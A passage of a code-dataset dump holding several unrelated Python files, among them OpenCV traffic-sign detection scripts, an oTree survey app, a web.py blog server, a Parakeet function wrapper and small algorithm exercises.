f.write(value[i][j][0]+',')\r\n else:\r\n f.write('-,')\r\n f.write('\\n')\r\n f.close()\r\n\t \r\n f=open('resTime.csv','w')\r\n f.write('model,2_1,2_2,2_3,3_1,3_2,3_3,4_1,4_2,4_3,5_1,5_2,5_3,6_1,6_2,6_3\\n')\r\n for key in models3:\r\n f.write(key+',')\r\n value=res[key]\r\n for i in range(5):\r\n for j in range(3):\r\n if not value[i][j]==0:\r\n f.write(value[i][j][1]+',')\r\n else:\r\n f.write('-,')\r\n f.write('\\n')\r\n f.close()\r\n","sub_path":"results/issta20model/cal.py","file_name":"cal.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"422703724","text":"class Solution(object):\n def isReflected(self, points):\n \"\"\"\n :type points: List[List[int]]\n :rtype: bool\n group points by y positions, then check x in pairs\n \"\"\"\n groups = {}\n for x, y in sorted(points):\n if y not in groups:\n groups[y] = [x]\n else:\n groups[y] += x,\n\n possible = None\n for ls in groups.values():\n l, r = 0, len(ls) - 1\n while l <= r:\n tmp = ls[l] + ls[r]\n if tmp % 2:\n return False\n tmp /= 2\n if possible and possible != tmp:\n return False\n possible = tmp\n l += 1\n r -= 1\n return True\n\n\n def isReflected(self, points):\n points.sort()\n return points == sorted([points[0][0] + points[-1][0] - x, y]\n for x, y in points)\n\n\n def isReflected(self, points):\n if not points: return True\n X = min(points)[0] + max(points)[0]\n return {(x, y) for x, y in points} == {(X - x, y) for x, y in points}","sub_path":"python/leetcode/356.py","file_name":"356.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"418585672","text":"from django.urls import path\n\nfrom .views import (FreeArticleDetailView, FreeArticleListView,\n PremiumArticleDetailView, PremiumArticleListView,\n SearchResultsListView)\n\nurlpatterns = [\n path('free/', FreeArticleListView.as_view(), name='free_article_list'),\n path('premium/', PremiumArticleListView.as_view(), name='premium_article_list'),\n path('free/', FreeArticleDetailView.as_view(), name='free_article_detail'),\n path('premium/', PremiumArticleDetailView.as_view(), name='premium_article_detail'),\n path('search/', SearchResultsListView.as_view(), name='search_results'),\n]\n\n","sub_path":"articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"120633607","text":"\"\"\"\nCS6476: Problem Set 2 Experiment file\n\nThis script contains a series of function calls that run your ps2\nimplementation and output images so you can verify your results.\n\"\"\"\n\n\nimport cv2\n\nimport ps2\n\n\ndef draw_tl_center(image_in, center, state):\n \"\"\"Marks the center of a traffic light image and adds coordinates\n with the state of the current image\n\n Use OpenCV drawing functions to place a marker that represents the\n traffic light center. Additionally, place text using OpenCV tools\n that show the numerical and string values of the traffic light\n center and state. Use the following format:\n\n ((x-coordinate, y-coordinate), 'color')\n\n See OpenCV's drawing functions:\n http://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html\n\n Make sure the font size is large enough so that the text in the\n output image is legible.\n Args:\n image_in (numpy.array): input image.\n center (tuple): center numeric values.\n state (str): traffic light state values can be: 'red',\n 'yellow', 'green'.\n\n Returns:\n numpy.array: output image showing a marker representing the\n traffic light center and text that presents the numerical\n coordinates with the traffic light state.\n \"\"\"\n cv2.circle(image_in,center,2,(0,0,0),3)\n cv2.putText(image_in, (\"((%d, %d), %s)\" % (center[0], center[1], state)), (center[0]+5,center[1]), cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), 2, cv2.CV_AA)\n cv2.putText(image_in, (\"((%d, %d), %s)\" % (center[0], center[1], state)), (center[0]+5,center[1]), cv2.FONT_HERSHEY_PLAIN, 1.0, (255, 255, 255), 1, cv2.CV_AA)\n\n return image_in\n\ndef mark_traffic_signs(image_in, signs_dict):\n #print signs_dict\n \"\"\"Marks the center of a traffic sign and adds its coordinates.\n\n This function uses a dictionary that follows the following\n structure:\n {'sign_name_1': (x, y), 'sign_name_2': (x, y), etc.}\n\n Where 'sign_name' can be: 'stop', 'no_entry', 'yield',\n 'construction', 'warning', and 'traffic_light'.\n\n Use cv2.putText to place the coordinate values in the output\n image.\n\n Args:\n image_in (numpy.array): the image to draw on.\n signs_dict (dict): dictionary containing the coordinates of\n each sign found in a scene.\n\n Returns:\n numpy.array: output image showing markers on each traffic\n sign.\n \"\"\"\n for key in signs_dict: \n cv2.circle(image_in,signs_dict[key],2,(0,0,0),3)\n cv2.putText(image_in, (\"(%d, %d)\" % (signs_dict[key][0], signs_dict[key][1])), (signs_dict[key][0]-30,signs_dict[key][1]-10), cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), 3, cv2.CV_AA)\n cv2.putText(image_in, (\"(%d, %d)\" % (signs_dict[key][0], signs_dict[key][1])), (signs_dict[key][0]-30,signs_dict[key][1]-10), cv2.FONT_HERSHEY_PLAIN, 1.0, (255, 255, 255), 1, cv2.CV_AA)\n\n cv2.putText(image_in, (\"%s\" % key), (signs_dict[key][0]-25,signs_dict[key][1]+30), cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), 3, cv2.CV_AA)\n cv2.putText(image_in, (\"%s\" % key), (signs_dict[key][0]-25,signs_dict[key][1]+30), cv2.FONT_HERSHEY_PLAIN, 1.0, (255,255,255), 1, cv2.CV_AA)\n\n\n return image_in\n\ndef part_1():\n\n input_images = ['simple_tl', 'scene_tl_1', 'scene_tl_2', 'scene_tl_3']#'test_images/tl_green_299_287_background']#'scene_tl_3']\n output_labels = ['ps2-1-a-1', 'ps2-1-a-2', 'ps2-1-a-3', 'ps2-1-a-4']\n\n # Define a radii range, you may define a smaller range based on your\n # observations.\n radii_range = range(10, 30, 1)\n\n for img_in, label in zip(input_images, output_labels):\n\n tl = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords, state = ps2.traffic_light_detection(tl, radii_range)\n\n img_out = draw_tl_center(tl, coords, state)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n #tl = cv2.imread(\"input_images/{}.png\".format(img_in))\n #cv2.imwrite(\"output/{}.png\".format(label), ps2.traffic_light_detection(tl, radii_range))\n\n\ndef part_2():\n\n input_images = ['scene_dne_1', \n 'scene_stp_1', \n 'scene_constr_1',\n 'scene_wrng_1', \n 'scene_yld_1']\n\n output_labels = ['ps2-2-a-1', \n 'ps2-2-a-2', \n 'ps2-2-a-3', \n 'ps2-2-a-4',\n 'ps2-2-a-5']\n\n sign_fns = [ps2.do_not_enter_sign_detection, \n ps2.stop_sign_detection,\n ps2.construction_sign_detection, \n ps2.warning_sign_detection,\n ps2.yield_sign_detection]\n\n sign_labels = ['no_entry','stop','construction','warning','yield']#['no_entry', 'stop', 'construction', 'warning', 'yield']\n\n for img_in, label, fn, name in zip(input_images, output_labels, sign_fns,\n sign_labels):\n\n sign_img = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = fn(sign_img)\n\n temp_dict = {name: coords}\n img_out = mark_traffic_signs(sign_img, temp_dict)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n #sign_img = cv2.imread(\"input_images/{}.png\".format(img_in))\n #cv2.imwrite(\"output/{}.png\".format(label), fn(sign_img))\n\n\ndef part_3():\n\n input_images = ['scene_some_signs', 'scene_all_signs']\n output_labels = ['ps2-3-a-1', 'ps2-3-a-2']\n\n for img_in, label in zip(input_images, output_labels):\n\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef part_4():\n input_images = ['scene_some_signs_noisy', 'scene_all_signs_noisy']\n output_labels = ['ps2-4-a-1', 'ps2-4-a-2']\n\n for img_in, label in zip(input_images, output_labels):\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection_noisy(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef part_5a():\n input_images = ['img-5-a-1', 'img-5-a-2', 'img-5-a-3']\n output_labels = ['ps2-5-a-1', 'ps2-5-a-2', 'ps2-5-a-3']\n\n for img_in, label in zip(input_images, output_labels):\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection_challenge(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef part_5b():\n input_images = ['img-5-b-1', 'img-5-b-2', 'img-5-b-3']\n output_labels = ['ps2-5-b-1', 'ps2-5-b-2', 'ps2-5-b-3']\n\n for img_in, label in zip(input_images, output_labels):\n scene = cv2.imread(\"input_images/{}.png\".format(img_in))\n coords = ps2.traffic_sign_detection_challenge(scene)\n\n img_out = mark_traffic_signs(scene, coords)\n cv2.imwrite(\"output/{}.png\".format(label), img_out)\n\n\ndef sign_test():\n input_images = [#'scene_dne_1']\n #'test_images/stop_blank_top_left']\n #'test_images/stop_blank_top_right']\n #'test_images/stop_blank_bot_right']\n #'scene_stp_1']\n #'test_images/stop_249_149_blank']\n #'test_images/stop_249_149_background']\n #'scene_constr_1']\n #'test_images/construction_150_200_blank']\n #'scene_wrng_1']\n #'test_images/warning_250_300_blank']\n #'test_images/yield_173_358_blank']\n #'scene_yld_1']\n #'test_images/yield_173_358_background']\n #'test_images/scene_all_signs']\n #'test_images/yield_bot_left_blank']\n #'scene_some_signs']\n #'scene_all_signs']\n #'scene_some_signs_noisy']\n 'scene_all_signs_noisy']\n\n output_labels = ['test_scene']\n #'ps2-2-a-2'] \n #'ps2-2-a-3']\n #'ps2-2-a-4']\n #'ps2-2-a-5']\n\n sign_fns = [#ps2.do_not_enter_sign_detection]\n #ps2.stop_sign_detection]\n #ps2.construction_sign_detection]\n ps2.warning_sign_detection]\n #ps2.yield_sign_detection]\n\n sign_labels = ['construction'] #['no_entry', 'stop', 'construction', 'warning', 'yield']\n\n for img_in, label, fn, name in zip(input_images, output_labels, sign_fns,\n sign_labels):\n\n sign_img = cv2.imread(\"input_images/{}.png\".format(img_in))\n cv2.imwrite(\"output/{}.png\".format(label), fn(sign_img))\n\n\n\ndef traffic_light_test():\n name = [#'scene_all_signs']\n #'scene_some_signs']\n #'scene_some_signs_noisy']\n 'scene_all_signs_noisy']\n\n radii_range = range(10,30,1)\n img_in = cv2.imread(\"input_images/{}.png\".format(name[0]))\n cv2.imwrite(\"output/{}.png\".format('test_scene_tl'), ps2.noisy_traffic_light_detection(img_in))\n\nif __name__ == '__main__':\n part_1()\n part_2()\n #sign_test()\n part_3()\n #traffic_light_test()\n part_4()\n part_5a()\n part_5b()\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":9260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"562074650","text":"from otree.api import Currency as c, currency_range\nfrom . import models\nfrom ._builtin import Page, WaitPage\nfrom .models import Constants\n\n\nclass StartPage(Page):\n\n form_model = 'player'\n form_fields = [\n 'email',\n 'email_validate',\n 'window_height',\n 'window_width',\n 'user_agent',\n 'is_iPad_iOS13',\n ]\n\n def vars_for_template(self):\n return {\n # has to be added in settings.py in SESSION_CONFIG_DEFAULTS\n # 'super': self.session.config['super'],\n # 'supermail': self.session.config['supermail'],\n }\n\n def error_message(self, values):\n if values['email'] != values['email_validate']:\n return \"\"\"Die eingegebenen E-Mail-Adressen stimmen nicht überein.\"\"\"\n\n def before_next_page(self):\n # parti = self.request.build_absolute_uri(self.player.participant._start_url())\n # self.request.session[\"otree\"] = parti\n # self.request.session.set_expiry(1209600) # timeout 2 weeks\n pass\n\n\nclass ScreenOut(Page):\n \"\"\" Page to screen out participants with mobile devices.\n Only displayed if participant is using a mobile; checks\n whether participant is using a mobile device on reloading;\n Shows a next button only if page is reloaded not using a\n mobile device.\n \"\"\"\n\n form_model = 'player'\n form_fields = [\n 'window_height2',\n 'window_width2',\n 'user_agent2',\n 'is_iPad_iOS13_2'\n ]\n\n def is_displayed(self):\n if any(x in self.player.user_agent for x in [\n 'iPhone',\n 'iPad',\n 'Android',\n 'Mobi',\n 'PlayBook',\n 'BlackBerry',\n 'Edge',\n 'MSIE',\n 'Trident'\n ]) or self.player.is_iPad_iOS13 is True:\n return True\n else:\n return False\n\nclass Intro(Page):\n def vars_for_template(self):\n conversion = self.session.config['real_world_currency_per_point']\n participation_fee = self.session.config['participation_fee']\n return dict(conversion=conversion,\n participation_fee=participation_fee)\n\npage_sequence = [\n StartPage,\n ScreenOut,\n Intro\n]\n","sub_path":"StartPage/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"3388702","text":"import os\r\nprint(os.environ)\r\n\r\nimport time\r\nimport numpy as np\r\nfrom scipy.stats import gaussian_kde\r\nfrom threading import Thread\r\nfrom queue import Queue\r\n\r\ndef make_G(X_prob_i, X_prob_j, X_i, X_j, threshold_p = 0.9):\r\n num_points = 10000\r\n data = np.array([X_prob_i, X_prob_j])\r\n det = np.linalg.det(np.corrcoef(data))\r\n eps = 1.0e-9\r\n if abs(det) < eps:\r\n return np.zeros((X_i.shape[0]), dtype=np.bool)\r\n\r\n kde = gaussian_kde(data)\r\n points = kde.resample(num_points)\r\n pr = np.array(kde(points))\r\n pr.sort()\r\n I = np.cumsum(pr)\r\n I = I / I[-1]\r\n ind = np.flatnonzero(I >= threshold_p)[0]\r\n data = np.array([X_i, X_j])\r\n p = np.array(kde(data))\r\n if ind < pr.size:\r\n q = pr[ind]\r\n G = p < q\r\n else:\r\n G = np.ones((X_i.shape[0]), dtype=np.bool)\r\n \r\n return G\r\n\r\nclass CalcWorker(Thread):\r\n def __init__(self, queue):\r\n Thread.__init__(self)\r\n self.queue = queue\r\n \r\n def run(self):\r\n global x, G\r\n num = 65\r\n while True:\r\n i = self.queue.get()\r\n be = time.time()\r\n for j in range(G.shape[2]):\r\n G[:, i, j] = make_G(x[:num, i], x[:num, j], x[:, i], x[:, j])\r\n self.queue.task_done()\r\n en = time.time()\r\n print(i, 'Time: ', en - be)\r\n\r\ndef main():\r\n global x, G\r\n ts = time.time()\r\n n = 1000\r\n num = 65\r\n np.random.seed(42)\r\n x = np.random.rand(100, n)\r\n G = np.zeros((100, n, n), dtype = 'bool')\r\n \r\n #for i in range(n):\r\n '''\r\n be = time.time()\r\n i = 0\r\n for j in range(G.shape[2]):\r\n G[:, i, j] = make_G(x[:num, i], x[:num, j], x[:, i], x[:, j])\r\n en = time.time()\r\n print 'Time: ', en - be\r\n print G.mean()\r\n '''\r\n #return\r\n \r\n # Create a queue to communicate with the worker threads\r\n queue = Queue()\r\n # Create 8 worker threads\r\n for i in range(4):\r\n worker = CalcWorker(queue)\r\n # Setting daemon to True will let the main thread exit even though the workers are blocking\r\n worker.daemon = True\r\n worker.start()\r\n # Put the tasks into the queue as a tuple\r\n for i in range(4):\r\n queue.put(i)\r\n # Causes the main thread to wait for the queue to finish processing all the tasks\r\n queue.join()\r\n\r\n print('Took {}'.format(time.time() - ts))\r\n print(G.mean())\r\n\r\nmain()","sub_path":"src/test_kde.py","file_name":"test_kde.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"298740","text":"from ctypes import c_void_p, c_int\r\nimport re\r\n\r\nfrom parakeet_common import list_to_ctypes_array, LibPar, LOG \r\nfrom parakeet_register import VisitedFunctions, VisitedFunctionGlobals\r\nfrom parakeet_values import python_value_to_parakeet, parakeet_value_to_python\r\n\r\ndef _prep_value_list(vals):\r\n parakeet_values = [python_value_to_parakeet(v) for v in vals]\r\n return list_to_ctypes_array(parakeet_values)\r\n\r\ndef _prep_int_list(ints): \r\n n = len(ints)\r\n array_t = c_int * n\r\n arr = array_t()\r\n for i, x in enumerate(ints):\r\n arr[i] = x \r\n return arr \r\n \r\ndef _prep_args(args, kwds):\r\n arg_values = _prep_value_list(args)\r\n \r\n kwd_names = []\r\n kwd_values = []\r\n for (k,v) in kwds.items():\r\n kwd_names.append(c_str(k))\r\n kwd_values.append(python_value_to_parakeet(v))\r\n kwd_names = list_to_ctypes_array(kwd_names)\r\n kwd_values = list_to_ctypes_array(kwd_values)\r\n return arg_values, kwd_names, kwd_values \r\n\r\nclass WrappedFunction:\r\n def __init__(self, old_function, untyped_id, global_vars):\r\n assert untyped_id is not None\r\n self.old_function = old_function\r\n # pretend we are the same function\r\n self.__name__ = old_function.__name__\r\n self.__module__ = old_function.__module__\r\n VisitedFunctions[self] = untyped_id\r\n VisitedFunctionGlobals[self] = global_vars \r\n self.parakeet_untyped_id = untyped_id\r\n self.global_vars = global_vars\r\n \r\n\r\n def _get_global_value(self, var):\r\n var_parts = var.split('.')\r\n try:\r\n curr_val = self.old_function.func_globals[var_parts[0]]\r\n except KeyError:\r\n if isinstance(__builtins__,dict):\r\n curr_val = __builtins__[var_parts[0]]\r\n else:\r\n curr_val = getattr(__builtins__, var_parts[0])\r\n #print \"[Parakeet] Should %s be evaluated?\" % var_parts[0]\r\n for i in range(1, len(var_parts)):\r\n curr_val = curr_val.__dict__[var_parts[i]]\r\n return curr_val\r\n\r\n def _globals_as_python_values(self):\r\n return [self._get_global_value(g) for g in self.global_vars]\r\n \r\n def _globals_as_parakeet_value_list(self):\r\n return [python_value_to_parakeet(v) for v in self._globals_as_python_values()]\r\n \r\n def _globals_as_parakeet_value_array(self):\r\n return list_to_ctypes_array(self._globals_as_parakeet_value_list())\r\n \r\n def _convert_returned_value(self, ret): \r\n if ret.return_code != 0:\r\n raise RuntimeError(\"[Parakeet] Execution failed: %s\" % ret.error_msg)\r\n else:\r\n n = ret.results_len \r\n if n == 0:\r\n return\r\n elif n == 1:\r\n return parakeet_value_to_python(ret.results[0])\r\n else:\r\n results = [parakeet_value_to_python(ret.results[i]) for i in xrange(n)]\r\n return tuple(results)\r\n\r\n def _run_adverb(self, adverb_name, args, kwds):\r\n\r\n fn_id = self.parakeet_untyped_id\r\n global_values = self._globals_as_python_values()\r\n \r\n \r\n reserved_keywords = ['axis', 'axes', 'fixed', 'combine_fixed']\r\n \r\n if 'axis' in kwds:\r\n axes = kwds['axis']\r\n elif 'axes' in kwds: \r\n axes = kwds['axes']\r\n else:\r\n axes = None\r\n \r\n if axes is not None:\r\n try:\r\n iter(axes)\r\n except:\r\n axes = [axes]\r\n \r\n fixed = kwds.get('fixed', [])\r\n \r\n try:\r\n iter(fixed)\r\n except:\r\n fixed = [fixed]\r\n #TODO: make keywords work for fixed args\r\n fixed_values, _, _ = _prep_args(global_values + fixed, {})\r\n \r\n\r\n if adverb_name.lower() == \"map\":\r\n combine_provided = False\r\n combine_fixed_values = _prep_args([], {})\r\n else:\r\n combine_provided = True \r\n if combine is None:\r\n wrapped_combine = self \r\n else:\r\n wrapped_combine = PAR(combine)\r\n combine_id = wrapped_combine.parakeet_untyped_id\r\n combine_globals = wrapped_combine._globals_as_python_values()() \r\n \r\n combine_fixed = kwds.get('combine_fixed', [])\r\n try:\r\n iter(combine_fixed)\r\n except:\r\n combine_fixed = [combine_fixed] \r\n combine_fixed_values, _, _ = \\\r\n _prep_args(combine_globals + combine_fixed, {})\r\n \r\n init = kwds.get('init', [])\r\n try:\r\n iter(init)\r\n except:\r\n init = [init]\r\n \r\n if axes is not None:\r\n axes_given = True\r\n axes_values = _prep_int_list(axes) \r\n n_axes = len(axes_values)\r\n else:\r\n axes_given = False\r\n axes_values = None\r\n n_axes = 0\r\n\r\n init_values = _prep_value_list(init)\r\n\r\n\r\n filtered_kwds = \\\r\n dict([(k,v) for (k,v) in kwds.items() if k not in reserved_keywords]) \r\n array_values, array_keywords, array_keyword_values = \\\r\n _prep_args(args, filtered_kwds) \r\n \r\n from ctypes import c_int\r\n result = LibPar.run_adverb(\r\n adverb_name, \r\n fn_id,\r\n fixed_values, c_int(len(fixed_values)), \r\n combine_id, combine_provided, \r\n combine_fixed_values, c_int(len(combine_fixed_values)), \r\n init_values, c_int(len(init_values)), \r\n axes_given, axes_values, c_int(n_axes), \r\n array_values, c_int(len(array_values)), \r\n array_keywords, array_keyword_values, c_int(len(array_keywords))) \r\n return self._convert_returned_value(result)\r\n \r\n\r\n def map(self, *args, **kwds):\r\n return self._run_adverb(\"map\", None, args, kwds)\r\n \r\n def reduce(self, combine = None, *args, **kwds):\r\n return self._run_adverb(\"reduce\", combine, args, kwds)\r\n \r\n def scan(self, combine = None, *args, **kwds):\r\n return self._run_adverb(\"scan\", combine, args, kwds)\r\n \r\n def allpairs(self, combine = None, *args, **kwds): \r\n return self._run_adverb(\"allpairs\", combine, args, kwds)\r\n \r\n def __call__(self, *args, **kwds):\r\n global_values = self._prep_globals()\r\n arg_values, kwd_names, kwd_values = _prep_args(args, kwds) \r\n\r\n ret = LibPar.run_function(\r\n self.parakeet_untyped_id, \r\n global_values, c_int(len(global_values)), \r\n arg_values, c_int(len(arg_values)),\r\n kwd_names, kwd_values, c_int(len(kwd_names)))\r\n return self._convert_returned_value(ret)\r\n \r\n def call_original(self, *args, **kwds):\r\n return self.old_function(*args, **kwds)\r\n\r\n\r\n\r\nfrom parakeet_register import register_function \r\n\r\ndef PAR(old_function):\r\n untyped_id, global_vars = register_function(old_function)\r\n return WrappedFunction(old_function, untyped_id, global_vars)\r\n","sub_path":"Python/parakeet_wrapped_function.py","file_name":"parakeet_wrapped_function.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"498389318","text":"import random\nimport time\nfrom collections import Counter\n\nsize = 1000000\nseq = []\ncount = 0\nfor x in range(size):\n seq.append(random.randint(1, 1000))\n count += 1 \n\ndef secondMoment(seq):\n c = Counter(seq)\n return sum(v ** 2 for v in c.values())\n\n\ndef AMSestimate(seq, num_samples):\n inds = list(range(len(seq)))\n random.shuffle(inds)\n inds = sorted(inds[: num_samples])\n\n d = {}\n for i, c in enumerate(seq):\n if i in inds and c not in d:\n d[c] = 0\n if c in d:\n d[c] += 1\n print(\"0 moment: \", len(d))\n print(\"1st moment\", size)\n return int(len(seq) / float(len(d)) * sum((2 * v - 1) for v in d.values()))\n\n\nb = secondMoment(seq)\na = AMSestimate(seq, 100)\nprint(\"2nd moment: \", b)\nprint(\"2nd moment by ams from 100: \", a)\nprint(abs(b - a))\nc = AMSestimate(seq, 500)\nprint(\"2nd moment: \", b)\nprint(\"2nd moment by ams from 500: \", c)\nprint(abs(c - a))\n","sub_path":"3task/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"211705039","text":"import numpy as np\nfrom PIL import ImageGrab\nimport cv2\nimport time\nimport pyautogui\nlast_time = time.time()\n\nbase_screen = ImageGrab.grab(bbox = (0, 0, 1920, 1080))\n#base_screen.save(\"pic/temp.png\")\n\ntemplate = cv2.imread(\"pic/py_icon01.jpg\", 0)\nw, h = template.shape[::-1]\n\n#img_rgb = cv2.imread(\"pic/temp.png\")\nimg_gray = cv2.cvtColor(np.array(base_screen), cv2.COLOR_BGR2GRAY)\n#cv2.imshow(\"Название окна\", img_gray)\n#cv2.waitKey(0)\n\nres = cv2.matchTemplate(img_gray, template, cv2.TM_CCOEFF_NORMED)\nloc = np.where(res >= 0.8)\nprint (np.array(loc))\nprint(time.time() - last_time)\nfor pt in zip(*loc[::-1]):\n x = int(pt[0])\n print(x)\n y = int(pt[1])\n print(y)\n\nprint(x,y)\npyautogui.moveTo(x, y)","sub_path":"test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"172848673","text":"#!/usr/bin/env python\n# coding: utf-8\n#########################################################################\n#Name:codeMain.py \n#BY yu \n#Discription:OPen \n# \n######################################################################### \nimport os\nimport web\nfrom web.contrib.template import render_jinja\nimport article\nimport section\nimport comment\nimport write\nimport util\n\n#import dbMongoApi\n#import sys \n#default_encoding = 'utf-8' \n#if sys.getdefaultencoding() != default_encoding: \n# reload(sys) \n# sys.setdefaultencoding(default_encoding)\n# Client = pymongo.MongoClient('localhost',27017)\n# conn = Client.afterwards\n#web.config.debug = False\nurls = (\n '/', 'view.indexView',\n '/test','index',\n '/user','view.userView',\n '/writer?','view.writerView',\n '/sign_in','view.sign_inView',\n '/article/(.+)','view.articleView',\n '/article','view.articleListView',\n '/sign_up','view.sign_upView',\n '/settings','view.settingsView',\n '/search', 'view.searchView',\n '/mars/feed', 'feedRequest.feeds',\n '/mars/signup', 'userRequest.signUp',\n '/mars/signin', 'userRequest.signIn',\n '/mars/signout','userRequest.signOut',\n '/mars/article/(.+)/follow', 'articleRequest.addArticleFollow',\n '/mars/article/(.+)/unfollow', 'articleRequest.delArticleFollow',\n '/mars/article/(.+)/write','writeRequest.addWrite',\n '/mars/article/(.+)', 'articleRequest.articles',\n '/mars/article', 'articleRequest.articles',\n '/mars/article/(.+)/like', 'articleRequest.articleLike',\n '/mars/section/(.+)/like', 'sectionRequest.sectionLike',\n \"/mars/section/(.+)/comment\", \"commentRequest.comments\",\n '/mars/section', 'sectionRequest.sections',\n '/mars/user/(.+)/follow', 'userRequest.addUserFollow',\n '/mars/user/(.+)/unfollow', 'userRequest.delUserFollow',\n '/mars/user/(.+)/article', 'userRequest.userArticle',\n '/mars/user/(.+)/feed', 'userRequest.userFeed',\n \"/mars/user/(.+)\", \"userRequest.userData\",\n '/mars/user', 'userRequest.userData',\n '/upload', 'fileUpload.fileUpload',\n '/templates','test'\n)\n# app_root = os.path.dirname(__file__)\n# templates_root = os.path.join(app_root,'temp')\n# render = web.template.render(templates_root)\n# class CookieSet:\n# def GET(self):\n# web.setcookie(\"age\", \"23\", 10)\n# return \"Your cookie is create\"\n\n# class CookieGet:\n# def GET(self):\n# try:\n# return \"Your age is : \" \n# except:\n# return \"Your cookie doesn't exists\"\n\n\n\n################################################################################################\nclass index:\n def __init__(self):\n self.render = render_jinja('temp',encoding = 'utf-8',)\n def GET (self,urlId='693c4130-35fe-11e5-b208-60571866305e'):\n getInput = web.input(page = 0, size = 10, search = None, userId = None, token = None, type = None)\n page = int(getInput.page)\n search = getInput.search\n userId = getInput.userId\n token = getInput.token\n if getInput.type:\n type = int(getInput.type)\n type = getInput.type \n pageSize = int(getInput.size)\n returnData = article.getArticle(articleId = urlId, page = page,pageSize = pageSize, search = search, type = type)\n if util.isLogIn(userId,token) and urlId:\n if follow.isFollow(userId,urlId):\n returnData['isFollow'] = 1\n else:\n returnData['isFollow'] = 0 \n # return util.returnBson(1,returnData)\n # data = {}\n # data['likeCount'] = 1000\n # data['commentCount'] = 1000\n # data['time'] = u'昨天'\n # data['content'] = u'皮卡简对皮卡韬对皮卡娇'\n # data['name'] = u'萌萌哒的'\n return self.render.test2(data = returnData)\n\n\n########################################################################################################\n# session = web.session.Session(app, web.session.DiskStore('sessions'))\n \n# web.wsgi.runwsgi = lambda func, addr=None: web.wsgi.runfcgi(func, addr)\n# def session_hook():\n# web.ctx.session = session\n# app.add_processor(web.loadhook(session_hook))##print web.ctx.session.xxx\napp = web.application(urls, globals())\nif web.config.get('_session') is None:\n session = web.session.Session(app, web.session.DiskStore('sessions'),initializer={'userName':None,'userId':None,'userAvatar':None,'token':None})\n web.config._session = session\nelse:\n session = web.config._session \nif __name__ == \"__main__\":\n \n app.run()\n ","sub_path":"codeMain.py","file_name":"codeMain.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"563997051","text":"# Copyright (c) 2012 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom cpp_type_generator import CppTypeGenerator\nimport json\nimport model\nimport unittest\n\nclass CppTypeGeneratorTest(unittest.TestCase):\n def setUp(self):\n self.model = model.Model()\n self.permissions_json = json.loads(open('test/permissions.json').read())\n self.model.AddNamespace(self.permissions_json[0],\n 'path/to/permissions.json')\n self.permissions = self.model.namespaces.get('permissions')\n self.windows_json = json.loads(open('test/windows.json').read())\n self.model.AddNamespace(self.windows_json[0],\n 'path/to/window.json')\n self.windows = self.model.namespaces.get('windows')\n self.tabs_json = json.loads(open('test/tabs.json').read())\n self.model.AddNamespace(self.tabs_json[0],\n 'path/to/tabs.json')\n self.tabs = self.model.namespaces.get('tabs')\n\n def testGenerateCppIncludes(self):\n manager = CppTypeGenerator('', self.windows, 'windows_api')\n manager.AddNamespace(self.tabs, 'tabs_api')\n self.assertEquals('#include \"path/to/tabs_api.h\"',\n manager.GenerateCppIncludes().Render())\n manager = CppTypeGenerator('', self.permissions, 'permissions_api')\n manager.AddNamespace(self.permissions, 'permissions_api')\n self.assertEquals('', manager.GenerateCppIncludes().Render())\n\n def testGenerateCppIncludesMultipleTypes(self):\n m = model.Model()\n self.tabs_json[0]['types'].append(self.permissions_json[0]['types'][0])\n tabs_namespace = m.AddNamespace(self.tabs_json[0],\n 'path/to/tabs.json')\n self.windows_json[0]['functions'].append(\n self.permissions_json[0]['functions'][1])\n windows = m.AddNamespace(self.windows_json[0],\n 'path/to/windows.json')\n manager = CppTypeGenerator('', windows, 'windows_api')\n manager.AddNamespace(tabs_namespace, 'tabs_api')\n self.assertEquals('#include \"path/to/tabs_api.h\"',\n manager.GenerateCppIncludes().Render())\n\n def testGetTypeSimple(self):\n manager = CppTypeGenerator('', self.tabs, 